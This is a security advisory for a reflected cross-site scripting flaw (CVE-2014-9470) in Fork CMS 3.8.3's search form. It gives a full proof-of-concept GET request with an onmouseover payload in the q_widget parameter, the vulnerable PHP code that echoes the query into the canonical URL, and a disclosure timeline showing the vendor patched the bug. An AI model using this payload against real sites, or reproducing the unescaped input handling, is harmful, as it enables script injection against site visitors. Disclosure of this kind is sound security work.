# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3 # Google Dork: N/A # Date: 12/26/2014 # Exploit Author: Le Ngoc phi (phi.n.le@itas.vn) and ITAS Team (www.itas.vn) # Vendor Homepage: http://www.fork-cms.com # Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released # Version: Fork 3.8.3 # Tested on: N/A # CVE : CVE-2014-9470 ::VULNERABILITY DETAIL:: - Vulnerable parameter: q_widget - Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php - Vulnerable function: loadForm() - Attack vector: GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1 Host: forkcms.local User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic |utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5 Connection: keep-alive - Vulnerable code: private function loadForm() { // create form $this->frm = new FrontendForm('search', null, 'get', null, false); // could also have been submitted by our widget if (!\SpoonFilter::getGetValue('q', null, '')) { $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, ''); } // create elements $this->frm->addText( 'q', null, 255, 'inputText liveSuggest autoComplete', 'inputTextError liveSuggest autoComplete' ); // since we know the term just here we should set the canonical url here $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search'); if (isset($_GET['q']) && $_GET['q'] != '') { $canonicalUrl .= '?q=' . $_GET['q']; } $this->header->setCanonicalUrl($canonicalUrl); } ::DISCLOSURE:: - 12/25/2014: Detected vulnerability - 12/25/2014: Inform vendor and the vendor confirmed - 12/26/2014: Vendor releases patch - 12/26/2014: ITAS Team publishes information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi lity-in-fork-cms-70.html - https://github.com/forkcms/forkcms/issues/1018s - https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d 872114 ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. ---------------------------------------------------------------------------- ---------------- ITAS Team ITAS Corp. Be protected with us Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC. Tel : +84 - 8 - 38931952 Hotline : 0903445711 Email : <mailto:info@itas.vn> info@itas.vn <http://www.itas.vn/> www.itas.vn